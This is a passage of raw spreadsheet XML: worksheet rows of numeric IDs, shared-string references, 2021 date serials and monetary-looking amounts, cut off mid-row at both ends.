      <c r="D4836" t="s">
        <v>13987</v>
      </c>
      <c r="E4836">
        <v>2</v>
      </c>
      <c r="F4836" t="s">
        <v>1746</v>
      </c>
      <c r="G4836" s="1">
        <v>44354</v>
      </c>
      <c r="H4836">
        <v>120000</v>
      </c>
      <c r="I4836" t="s">
        <v>13994</v>
      </c>
      <c r="J4836" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4837" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4837">
        <v>25647</v>
      </c>
      <c r="B4837">
        <v>1510</v>
      </c>
      <c r="C4837" t="s">
        <v>4671</v>
      </c>
      <c r="D4837" t="s">
        <v>13987</v>
      </c>
      <c r="E4837">
        <v>2</v>
      </c>
      <c r="F4837" t="s">
        <v>13995</v>
      </c>
      <c r="G4837" s="1">
        <v>44354</v>
      </c>
      <c r="H4837">
        <v>12000</v>
      </c>
      <c r="I4837" t="s">
        <v>13996</v>
      </c>
      <c r="J4837" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4838" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4838">
        <v>25648</v>
      </c>
      <c r="B4838">
        <v>1510</v>
      </c>
      <c r="C4838" t="s">
        <v>4671</v>
      </c>
      <c r="D4838" t="s">
        <v>13987</v>
      </c>
      <c r="E4838">
        <v>2</v>
      </c>
      <c r="F4838" t="s">
        <v>13997</v>
      </c>
      <c r="G4838" s="1">
        <v>44354</v>
      </c>
      <c r="H4838">
        <v>12000</v>
      </c>
      <c r="I4838" t="s">
        <v>13996</v>
      </c>
      <c r="J4838" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4839" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4839">
        <v>25649</v>
      </c>
      <c r="B4839">
        <v>1510</v>
      </c>
      <c r="C4839" t="s">
        <v>4671</v>
      </c>
      <c r="D4839" t="s">
        <v>13987</v>
      </c>
      <c r="E4839">
        <v>2</v>
      </c>
      <c r="F4839" t="s">
        <v>13998</v>
      </c>
      <c r="G4839" s="1">
        <v>44354</v>
      </c>
      <c r="H4839">
        <v>12000</v>
      </c>
      <c r="I4839" t="s">
        <v>13996</v>
      </c>
      <c r="J4839" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4840" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4840">
        <v>25650</v>
      </c>
      <c r="B4840">
        <v>1510</v>
      </c>
      <c r="C4840" t="s">
        <v>4671</v>
      </c>
      <c r="D4840" t="s">
        <v>13987</v>
      </c>
      <c r="E4840">
        <v>2</v>
      </c>
      <c r="F4840" t="s">
        <v>3814</v>
      </c>
      <c r="G4840" s="1">
        <v>44354</v>
      </c>
      <c r="H4840">
        <v>12000</v>
      </c>
      <c r="I4840" t="s">
        <v>13996</v>
      </c>
      <c r="J4840" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4841" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4841">
        <v>25651</v>
      </c>
      <c r="B4841">
        <v>5604</v>
      </c>
      <c r="C4841" t="s">
        <v>16564</v>
      </c>
      <c r="D4841" t="s">
        <v>16565</v>
      </c>
      <c r="E4841">
        <v>26</v>
      </c>
      <c r="F4841" t="s">
        <v>13999</v>
      </c>
      <c r="G4841" s="1">
        <v>44322</v>
      </c>
      <c r="H4841" s="4">
        <v>394608</v>
      </c>
      <c r="I4841" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="4842" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4842">
        <v>25652</v>
      </c>
      <c r="B4842">
        <v>1029</v>
      </c>
      <c r="C4842" t="s">
        <v>4661</v>
      </c>
      <c r="D4842" t="s">
        <v>14000</v>
      </c>
      <c r="E4842">
        <v>16</v>
      </c>
      <c r="F4842" t="s">
        <v>14001</v>
      </c>
      <c r="G4842" s="1">
        <v>44369</v>
      </c>
      <c r="H4842">
        <v>0</v>
      </c>
      <c r="J4842" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4843" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4843">
        <v>25653</v>
      </c>
      <c r="B4843">
        <v>1029</v>
      </c>
      <c r="C4843" t="s">
        <v>4661</v>
      </c>
      <c r="D4843" t="s">
        <v>14000</v>
      </c>
      <c r="E4843">
        <v>16</v>
      </c>
      <c r="F4843" t="s">
        <v>2236</v>
      </c>
      <c r="G4843" s="1">
        <v>44369</v>
      </c>
      <c r="H4843">
        <v>0</v>
      </c>
      <c r="J4843" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4844" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4844">
        <v>25654</v>
      </c>
      <c r="B4844">
        <v>1029</v>
      </c>
      <c r="C4844" t="s">
        <v>4661</v>
      </c>
      <c r="D4844" t="s">
        <v>14000</v>
      </c>
      <c r="E4844">
        <v>16</v>
      </c>
      <c r="F4844" t="s">
        <v>10007</v>
      </c>
      <c r="G4844" s="1">
        <v>44369</v>
      </c>
      <c r="H4844">
        <v>2000</v>
      </c>
      <c r="J4844" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4845" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4845">
        <v>25655</v>
      </c>
      <c r="B4845">
        <v>1029</v>
      </c>
      <c r="C4845" t="s">
        <v>4661</v>
      </c>
      <c r="D4845" t="s">
        <v>14000</v>
      </c>
      <c r="E4845">
        <v>16</v>
      </c>
      <c r="F4845" t="s">
        <v>9441</v>
      </c>
      <c r="G4845" s="1">
        <v>44369</v>
      </c>
      <c r="H4845">
        <v>6500</v>
      </c>
      <c r="J4845" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4846" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4846">
        <v>25656</v>
      </c>
      <c r="B4846">
        <v>1029</v>
      </c>
      <c r="C4846" t="s">
        <v>4661</v>
      </c>
      <c r="D4846" t="s">
        <v>14000</v>
      </c>
      <c r="E4846">
        <v>16</v>
      </c>
      <c r="F4846" t="s">
        <v>673</v>
      </c>
      <c r="G4846" s="1">
        <v>44369</v>
      </c>
      <c r="H4846">
        <v>4500</v>
      </c>
      <c r="J4846" t="s">
        <v>10738</v>
      </c>
    </row>
    <row r="4847" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4847">
        <v>25657</v>
      </c>
      <c r="B4847">
        <v>5693</v>
      </c>
      <c r="C4847" t="s">
        <v>9252</v>
      </c>
      <c r="D4847" t="s">
        <v>14002</v>
      </c>
      <c r="E4847">
        <v>12</v>
      </c>
      <c r="F4847" t="s">
        <v>12176</v>
      </c>
      <c r="G4847" s="1">
        <v>44363</v>
      </c>
      <c r="H4847">
        <v>1000000</v>
      </c>
      <c r="I4847" t="s">
        <v>9952</v>
      </c>
      <c r="J4847" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4848" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4848">
        <v>25660</v>
      </c>
      <c r="B4848">
        <v>1808</v>
      </c>
      <c r="C4848" t="s">
        <v>16573</v>
      </c>
      <c r="D4848" t="s">
        <v>16574</v>
      </c>
      <c r="E4848">
        <v>14</v>
      </c>
      <c r="F4848" t="s">
        <v>6635</v>
      </c>
      <c r="G4848" s="1">
        <v>44370</v>
      </c>
      <c r="H4848" s="4">
        <v>2371369</v>
      </c>
      <c r="I4848" t="s">
        <v>9485</v>
      </c>
      <c r="J4848" t="s">
        <v>14003</v>
      </c>
    </row>
    <row r="4849" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4849">
        <v>25661</v>
      </c>
      <c r="B4849">
        <v>5466</v>
      </c>
      <c r="C4849" t="s">
        <v>8919</v>
      </c>
      <c r="D4849" t="s">
        <v>14004</v>
      </c>
      <c r="E4849">
        <v>2</v>
      </c>
      <c r="F4849" t="s">
        <v>9437</v>
      </c>
      <c r="G4849" s="1">
        <v>44354</v>
      </c>
      <c r="H4849">
        <v>600000</v>
      </c>
      <c r="J4849" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="4850" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4850">
        <v>25662</v>
      </c>
      <c r="B4850">
        <v>5466</v>
      </c>
      <c r="C4850" t="s">
        <v>8919</v>
      </c>
      <c r="D4850" t="s">
        <v>14004</v>
      </c>
      <c r="E4850">
        <v>2</v>
      </c>
      <c r="F4850" t="s">
        <v>14005</v>
      </c>
      <c r="G4850" s="1">
        <v>44354</v>
      </c>
      <c r="H4850">
        <v>200000</v>
      </c>
      <c r="J4850" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="4851" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4851">
        <v>25663</v>
      </c>
      <c r="B4851">
        <v>5466</v>
      </c>
      <c r="C4851" t="s">
        <v>8919</v>
      </c>
      <c r="D4851" t="s">
        <v>14004</v>
      </c>
      <c r="E4851">
        <v>2</v>
      </c>
      <c r="F4851" t="s">
        <v>11391</v>
      </c>
      <c r="G4851" s="1">
        <v>44354</v>
      </c>
      <c r="H4851">
        <v>200000</v>
      </c>
      <c r="J4851" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="4852" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4852">
        <v>25664</v>
      </c>
      <c r="B4852">
        <v>5466</v>
      </c>
      <c r="C4852" t="s">
        <v>8919</v>
      </c>
      <c r="D4852" t="s">
        <v>14004</v>
      </c>
      <c r="E4852">
        <v>2</v>
      </c>
      <c r="F4852" t="s">
        <v>10007</v>
      </c>
      <c r="G4852" s="1">
        <v>44354</v>
      </c>
      <c r="H4852">
        <v>400000</v>
      </c>
      <c r="J4852" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4853" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4853">
        <v>25665</v>
      </c>
      <c r="B4853">
        <v>5466</v>
      </c>
      <c r="C4853" t="s">
        <v>8919</v>
      </c>
      <c r="D4853" t="s">
        <v>14004</v>
      </c>
      <c r="E4853">
        <v>2</v>
      </c>
      <c r="F4853" t="s">
        <v>9441</v>
      </c>
      <c r="G4853" s="1">
        <v>44354</v>
      </c>
      <c r="H4853">
        <v>60000</v>
      </c>
      <c r="J4853" t="s">
        <v>14006</v>
      </c>
    </row>
    <row r="4854" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4854">
        <v>25666</v>
      </c>
      <c r="B4854">
        <v>5466</v>
      </c>
      <c r="C4854" t="s">
        <v>8919</v>
      </c>
      <c r="D4854" t="s">
        <v>14004</v>
      </c>
      <c r="E4854">
        <v>2</v>
      </c>
      <c r="F4854" t="s">
        <v>673</v>
      </c>
      <c r="G4854" s="1">
        <v>44354</v>
      </c>
      <c r="H4854">
        <v>300000</v>
      </c>
      <c r="J4854" t="s">
        <v>12800</v>
      </c>
    </row>
    <row r="4855" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4855">
        <v>25667</v>
      </c>
      <c r="B4855">
        <v>5466</v>
      </c>
      <c r="C4855" t="s">
        <v>8919</v>
      </c>
      <c r="D4855" t="s">
        <v>14004</v>
      </c>
      <c r="E4855">
        <v>2</v>
      </c>
      <c r="F4855" t="s">
        <v>4950</v>
      </c>
      <c r="G4855" s="1">
        <v>44354</v>
      </c>
      <c r="H4855">
        <v>70000</v>
      </c>
      <c r="J4855" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="4856" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4856">
        <v>25668</v>
      </c>
      <c r="B4856">
        <v>5674</v>
      </c>
      <c r="C4856" t="s">
        <v>9245</v>
      </c>
      <c r="D4856" t="s">
        <v>14007</v>
      </c>
      <c r="E4856">
        <v>29</v>
      </c>
      <c r="F4856" t="s">
        <v>14008</v>
      </c>
      <c r="G4856" s="1">
        <v>44354</v>
      </c>
      <c r="H4856">
        <v>3000</v>
      </c>
      <c r="I4856" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4857" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4857">
        <v>25669</v>
      </c>
      <c r="B4857">
        <v>5674</v>
      </c>
      <c r="C4857" t="s">
        <v>9245</v>
      </c>
      <c r="D4857" t="s">
        <v>14007</v>
      </c>
      <c r="E4857">
        <v>29</v>
      </c>
      <c r="F4857" t="s">
        <v>13707</v>
      </c>
      <c r="G4857" s="1">
        <v>44354</v>
      </c>
      <c r="H4857">
        <v>60</v>
      </c>
      <c r="I4857" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4858" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4858">
        <v>25670</v>
      </c>
      <c r="B4858">
        <v>5674</v>
      </c>
      <c r="C4858" t="s">
        <v>9245</v>
      </c>
      <c r="D4858" t="s">
        <v>14009</v>
      </c>
      <c r="E4858">
        <v>29</v>
      </c>
      <c r="F4858" t="s">
        <v>3341</v>
      </c>
      <c r="G4858" s="1">
        <v>44354</v>
      </c>
      <c r="H4858">
        <v>60</v>
      </c>
      <c r="I4858" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4859" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4859">
        <v>25671</v>
      </c>
      <c r="B4859">
        <v>5674</v>
      </c>
      <c r="C4859" t="s">
        <v>9245</v>
      </c>
      <c r="D4859" t="s">
        <v>14007</v>
      </c>
      <c r="E4859">
        <v>29</v>
      </c>
      <c r="F4859" t="s">
        <v>9964</v>
      </c>
      <c r="G4859" s="1">
        <v>44354</v>
      </c>
      <c r="H4859">
        <v>600</v>
      </c>
      <c r="I4859" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4860" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4860">
        <v>25673</v>
      </c>
      <c r="B4860">
        <v>841</v>
      </c>
      <c r="C4860" t="s">
        <v>3060</v>
      </c>
      <c r="D4860" t="s">
        <v>10999</v>
      </c>
      <c r="E4860">
        <v>2</v>
      </c>
      <c r="F4860" t="s">
        <v>2407</v>
      </c>
      <c r="G4860" s="1">
        <v>44358</v>
      </c>
      <c r="H4860">
        <v>5450000</v>
      </c>
      <c r="J4860" t="s">
        <v>14010</v>
      </c>
    </row>
    <row r="4861" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4861">
        <v>25677</v>
      </c>
      <c r="B4861">
        <v>4828</v>
      </c>
      <c r="C4861" t="s">
        <v>8911</v>
      </c>
      <c r="D4861" t="s">
        <v>14011</v>
      </c>
      <c r="E4861">
        <v>12</v>
      </c>
      <c r="F4861" t="s">
        <v>8913</v>
      </c>
      <c r="G4861" s="1">
        <v>44358</v>
      </c>
      <c r="H4861">
        <v>200000</v>
      </c>
      <c r="I4861" t="s">
        <v>14012</v>
      </c>
    </row>
    <row r="4862" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4862">
        <v>25678</v>
      </c>
      <c r="B4862">
        <v>883</v>
      </c>
      <c r="C4862" t="s">
        <v>4678</v>
      </c>
      <c r="D4862" t="s">
        <v>14013</v>
      </c>
      <c r="E4862">
        <v>2</v>
      </c>
      <c r="F4862" t="s">
        <v>2236</v>
      </c>
      <c r="G4862" s="1">
        <v>44358</v>
      </c>
      <c r="H4862">
        <v>720000</v>
      </c>
      <c r="J4862" t="s">
        <v>14014</v>
      </c>
    </row>
    <row r="4863" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4863">
        <v>25679</v>
      </c>
      <c r="B4863">
        <v>883</v>
      </c>
      <c r="C4863" t="s">
        <v>4678</v>
      </c>
      <c r="D4863" t="s">
        <v>14013</v>
      </c>
      <c r="E4863">
        <v>2</v>
      </c>
      <c r="F4863" t="s">
        <v>14015</v>
      </c>
      <c r="G4863" s="1">
        <v>44358</v>
      </c>
      <c r="H4863">
        <v>60000</v>
      </c>
      <c r="J4863" t="s">
        <v>14016</v>
      </c>
    </row>
    <row r="4864" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4864">
        <v>25681</v>
      </c>
      <c r="B4864">
        <v>5678</v>
      </c>
      <c r="C4864" t="s">
        <v>9269</v>
      </c>
      <c r="D4864" t="s">
        <v>14017</v>
      </c>
      <c r="E4864">
        <v>29</v>
      </c>
      <c r="F4864" t="s">
        <v>14018</v>
      </c>
      <c r="G4864" s="1">
        <v>44356</v>
      </c>
      <c r="H4864">
        <v>122</v>
      </c>
      <c r="I4864" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4865" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4865">
        <v>25682</v>
      </c>
      <c r="B4865">
        <v>5678</v>
      </c>
      <c r="C4865" t="s">
        <v>9269</v>
      </c>
      <c r="D4865" t="s">
        <v>14017</v>
      </c>
      <c r="E4865">
        <v>29</v>
      </c>
      <c r="F4865" t="s">
        <v>13707</v>
      </c>
      <c r="G4865" s="1">
        <v>44356</v>
      </c>
      <c r="H4865">
        <v>25</v>
      </c>
      <c r="I4865" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4866" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4866">
        <v>25683</v>
      </c>
      <c r="B4866">
        <v>5678</v>
      </c>
      <c r="C4866" t="s">
        <v>9269</v>
      </c>
      <c r="D4866" t="s">
        <v>14017</v>
      </c>
      <c r="E4866">
        <v>29</v>
      </c>
      <c r="F4866" t="s">
        <v>13559</v>
      </c>
      <c r="G4866" s="1">
        <v>44356</v>
      </c>
      <c r="H4866">
        <v>25</v>
      </c>
      <c r="I4866" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4867" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4867">
        <v>25684</v>
      </c>
      <c r="B4867">
        <v>5678</v>
      </c>
      <c r="C4867" t="s">
        <v>9269</v>
      </c>
      <c r="D4867" t="s">
        <v>14017</v>
      </c>
      <c r="E4867">
        <v>29</v>
      </c>
      <c r="F4867" t="s">
        <v>3341</v>
      </c>
      <c r="G4867" s="1">
        <v>44356</v>
      </c>
      <c r="H4867">
        <v>25</v>
      </c>
    </row>
    <row r="4868" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4868">
        <v>25687</v>
      </c>
      <c r="B4868">
        <v>5679</v>
      </c>
      <c r="C4868" t="s">
        <v>9207</v>
      </c>
      <c r="D4868" t="s">
        <v>14019</v>
      </c>
      <c r="E4868">
        <v>8</v>
      </c>
      <c r="F4868" t="s">
        <v>9209</v>
      </c>
      <c r="G4868" s="1">
        <v>44344</v>
      </c>
      <c r="H4868">
        <v>300</v>
      </c>
      <c r="I4868" t="s">
        <v>10966</v>
      </c>
    </row>
    <row r="4869" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4869">
        <v>25688</v>
      </c>
      <c r="B4869">
        <v>5543</v>
      </c>
      <c r="C4869" t="s">
        <v>16556</v>
      </c>
      <c r="D4869" t="s">
        <v>16557</v>
      </c>
      <c r="E4869">
        <v>12</v>
      </c>
      <c r="F4869" t="s">
        <v>14020</v>
      </c>
      <c r="G4869" s="1">
        <v>44337</v>
      </c>
      <c r="H4869" s="4">
        <v>20000</v>
      </c>
      <c r="I4869" t="s">
        <v>9899</v>
      </c>
    </row>
    <row r="4870" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4870">
        <v>25689</v>
      </c>
      <c r="B4870">
        <v>5631</v>
      </c>
      <c r="C4870" t="s">
        <v>9262</v>
      </c>
      <c r="D4870" t="s">
        <v>14021</v>
      </c>
      <c r="E4870">
        <v>12</v>
      </c>
      <c r="F4870" t="s">
        <v>14022</v>
      </c>
      <c r="G4870" s="1">
        <v>44357</v>
      </c>
      <c r="H4870">
        <v>800000</v>
      </c>
      <c r="J4870" t="s">
        <v>14023</v>
      </c>
    </row>
    <row r="4871" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4871">
        <v>25690</v>
      </c>
      <c r="B4871">
        <v>5631</v>
      </c>
      <c r="C4871" t="s">
        <v>9262</v>
      </c>
      <c r="D4871" t="s">
        <v>14021</v>
      </c>
      <c r="E4871">
        <v>12</v>
      </c>
      <c r="F4871" t="s">
        <v>2236</v>
      </c>
      <c r="G4871" s="1">
        <v>44357</v>
      </c>
      <c r="H4871">
        <v>80000</v>
      </c>
      <c r="J4871" t="s">
        <v>14023</v>
      </c>
    </row>
    <row r="4872" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4872">
        <v>25691</v>
      </c>
      <c r="B4872">
        <v>5631</v>
      </c>
      <c r="C4872" t="s">
        <v>9262</v>
      </c>
      <c r="D4872" t="s">
        <v>14021</v>
      </c>
      <c r="E4872">
        <v>12</v>
      </c>
      <c r="F4872" t="s">
        <v>14024</v>
      </c>
      <c r="G4872" s="1">
        <v>44357</v>
      </c>
      <c r="H4872">
        <v>10000</v>
      </c>
      <c r="J4872" t="s">
        <v>14023</v>
      </c>
    </row>
    <row r="4873" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4873">
        <v>25692</v>
      </c>
      <c r="B4873">
        <v>5631</v>
      </c>
      <c r="C4873" t="s">
        <v>9262</v>
      </c>
      <c r="D4873" t="s">
        <v>14021</v>
      </c>
      <c r="E4873">
        <v>12</v>
      </c>
      <c r="F4873" t="s">
        <v>9437</v>
      </c>
      <c r="G4873" s="1">
        <v>44357</v>
      </c>
      <c r="H4873">
        <v>5000</v>
      </c>
      <c r="J4873" t="s">
        <v>14023</v>
      </c>
    </row>
    <row r="4874" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4874">
        <v>25693</v>
      </c>
      <c r="B4874">
        <v>5631</v>
      </c>
      <c r="C4874" t="s">
        <v>9262</v>
      </c>
      <c r="D4874" t="s">
        <v>14021</v>
      </c>
      <c r="E4874">
        <v>12</v>
      </c>
      <c r="F4874" t="s">
        <v>609</v>
      </c>
      <c r="G4874" s="1">
        <v>44357</v>
      </c>
      <c r="H4874">
        <v>3000</v>
      </c>
    </row>
    <row r="4875" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4875">
        <v>25695</v>
      </c>
      <c r="B4875">
        <v>5642</v>
      </c>
      <c r="C4875" t="s">
        <v>9283</v>
      </c>
      <c r="D4875" t="s">
        <v>14025</v>
      </c>
      <c r="E4875">
        <v>1</v>
      </c>
      <c r="F4875" t="s">
        <v>14026</v>
      </c>
      <c r="G4875" s="1">
        <v>44343</v>
      </c>
      <c r="H4875">
        <v>80000</v>
      </c>
      <c r="I4875" t="s">
        <v>11138</v>
      </c>
      <c r="J4875" t="s">
        <v>14027</v>
      </c>
    </row>
    <row r="4876" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4876">
        <v>25698</v>
      </c>
      <c r="B4876">
        <v>5665</v>
      </c>
      <c r="C4876" t="s">
        <v>16575</v>
      </c>
      <c r="D4876" t="s">
        <v>16576</v>
      </c>
      <c r="E4876">
        <v>31</v>
      </c>
      <c r="F4876" t="s">
        <v>3763</v>
      </c>
      <c r="G4876" s="1">
        <v>44362</v>
      </c>
      <c r="H4876" s="4">
        <v>180000</v>
      </c>
      <c r="I4876" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4877" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4877">
        <v>25699</v>
      </c>
      <c r="B4877">
        <v>5665</v>
      </c>
      <c r="C4877" t="s">
        <v>2097</v>
      </c>
      <c r="D4877" t="s">
        <v>14028</v>
      </c>
      <c r="E4877">
        <v>31</v>
      </c>
      <c r="F4877" t="s">
        <v>14029</v>
      </c>
      <c r="G4877" s="1">
        <v>44362</v>
      </c>
      <c r="H4877">
        <v>0</v>
      </c>
      <c r="I4877" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4878" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4878">
        <v>25712</v>
      </c>
      <c r="B4878">
        <v>5715</v>
      </c>
      <c r="C4878" t="s">
        <v>9289</v>
      </c>
      <c r="D4878" t="s">
        <v>9581</v>
      </c>
      <c r="E4878">
        <v>33</v>
      </c>
      <c r="F4878" t="s">
        <v>9217</v>
      </c>
      <c r="G4878" s="1">
        <v>44358</v>
      </c>
      <c r="H4878">
        <v>7200</v>
      </c>
      <c r="I4878" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="4879" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4879">
        <v>25713</v>
      </c>
      <c r="B4879">
        <v>5699</v>
      </c>
      <c r="C4879" t="s">
        <v>9292</v>
      </c>
      <c r="D4879" t="s">
        <v>14030</v>
      </c>
      <c r="E4879">
        <v>29</v>
      </c>
      <c r="F4879" t="s">
        <v>14031</v>
      </c>
      <c r="G4879" s="1">
        <v>44364</v>
      </c>
      <c r="H4879">
        <v>1000</v>
      </c>
      <c r="I4879" t="s">
        <v>9550</v>
      </c>
      <c r="J4879" t="s">
        <v>14032</v>
      </c>
    </row>
    <row r="4880" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4880">
        <v>25714</v>
      </c>
      <c r="B4880">
        <v>379</v>
      </c>
      <c r="C4880" t="s">
        <v>890</v>
      </c>
      <c r="D4880" t="s">
        <v>14033</v>
      </c>
      <c r="E4880">
        <v>12</v>
      </c>
      <c r="F4880" t="s">
        <v>14034</v>
      </c>
      <c r="G4880" s="1">
        <v>44357</v>
      </c>
      <c r="H4880">
        <v>50000</v>
      </c>
      <c r="I4880" t="s">
        <v>9550</v>
      </c>
      <c r="J4880" t="s">
        <v>12810</v>
      </c>
    </row>
    <row r="4881" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4881">
        <v>25715</v>
      </c>
      <c r="B4881">
        <v>379</v>
      </c>
      <c r="C4881" t="s">
        <v>890</v>
      </c>
      <c r="D4881" t="s">
        <v>14033</v>
      </c>
      <c r="E4881">
        <v>12</v>
      </c>
      <c r="F4881" t="s">
        <v>9578</v>
      </c>
      <c r="G4881" s="1">
        <v>44357</v>
      </c>
      <c r="H4881">
        <v>50000</v>
      </c>
      <c r="I4881" t="s">
        <v>9550</v>
      </c>
      <c r="J4881" t="s">
        <v>12810</v>
      </c>
    </row>
    <row r="4882" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4882">
        <v>25716</v>
      </c>
      <c r="B4882">
        <v>379</v>
      </c>
      <c r="C4882" t="s">
        <v>890</v>
      </c>
      <c r="D4882" t="s">
        <v>14033</v>
      </c>
      <c r="E4882">
        <v>12</v>
      </c>
      <c r="F4882" t="s">
        <v>9676</v>
      </c>
      <c r="G4882" s="1">
        <v>44357</v>
      </c>
      <c r="H4882">
        <v>25000</v>
      </c>
      <c r="I4882" t="s">
        <v>9550</v>
      </c>
      <c r="J4882" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4883" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4883">
        <v>25717</v>
      </c>
      <c r="B4883">
        <v>379</v>
      </c>
      <c r="C4883" t="s">
        <v>890</v>
      </c>
      <c r="D4883" t="s">
        <v>14033</v>
      </c>
      <c r="E4883">
        <v>12</v>
      </c>
      <c r="F4883" t="s">
        <v>14035</v>
      </c>
      <c r="G4883" s="1">
        <v>44357</v>
      </c>
      <c r="H4883">
        <v>25000</v>
      </c>
      <c r="I4883" t="s">
        <v>9550</v>
      </c>
      <c r="J4883" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4884" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4884">
        <v>25719</v>
      </c>
      <c r="B4884">
        <v>379</v>
      </c>
      <c r="C4884" t="s">
        <v>890</v>
      </c>
      <c r="D4884" t="s">
        <v>14033</v>
      </c>
      <c r="E4884">
        <v>12</v>
      </c>
      <c r="F4884" t="s">
        <v>9928</v>
      </c>
      <c r="G4884" s="1">
        <v>44357</v>
      </c>
      <c r="H4884">
        <v>25000</v>
      </c>
      <c r="I4884" t="s">
        <v>9550</v>
      </c>
      <c r="J4884" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4885" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4885">
        <v>25720</v>
      </c>
      <c r="B4885">
        <v>379</v>
      </c>
      <c r="C4885" t="s">
        <v>890</v>
      </c>
      <c r="D4885" t="s">
        <v>14033</v>
      </c>
      <c r="E4885">
        <v>12</v>
      </c>
      <c r="F4885" t="s">
        <v>3814</v>
      </c>
      <c r="G4885" s="1">
        <v>44357</v>
      </c>
      <c r="H4885">
        <v>25000</v>
      </c>
      <c r="I4885" t="s">
        <v>9550</v>
      </c>
      <c r="J4885" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4886" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4886">
        <v>25721</v>
      </c>
      <c r="B4886">
        <v>379</v>
      </c>
      <c r="C4886" t="s">
        <v>890</v>
      </c>
      <c r="D4886" t="s">
        <v>14033</v>
      </c>
      <c r="E4886">
        <v>12</v>
      </c>
      <c r="F4886" t="s">
        <v>2924</v>
      </c>
      <c r="G4886" s="1">
        <v>44357</v>
      </c>
      <c r="H4886">
        <v>25000</v>
      </c>
      <c r="I4886" t="s">
        <v>9550</v>
      </c>
      <c r="J4886" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4887" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4887">
        <v>25722</v>
      </c>
      <c r="B4887">
        <v>5695</v>
      </c>
      <c r="C4887" t="s">
        <v>9257</v>
      </c>
      <c r="D4887" t="s">
        <v>14036</v>
      </c>
      <c r="E4887">
        <v>8</v>
      </c>
      <c r="F4887" t="s">
        <v>3076</v>
      </c>
      <c r="G4887" s="1">
        <v>44337</v>
      </c>
      <c r="H4887">
        <v>60000</v>
      </c>
      <c r="I4887" t="s">
        <v>14037</v>
      </c>
    </row>
    <row r="4888" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4888">
        <v>25723</v>
      </c>
      <c r="B4888">
        <v>5699</v>
      </c>
      <c r="C4888" t="s">
        <v>9292</v>
      </c>
      <c r="D4888" t="s">
        <v>14030</v>
      </c>
      <c r="E4888">
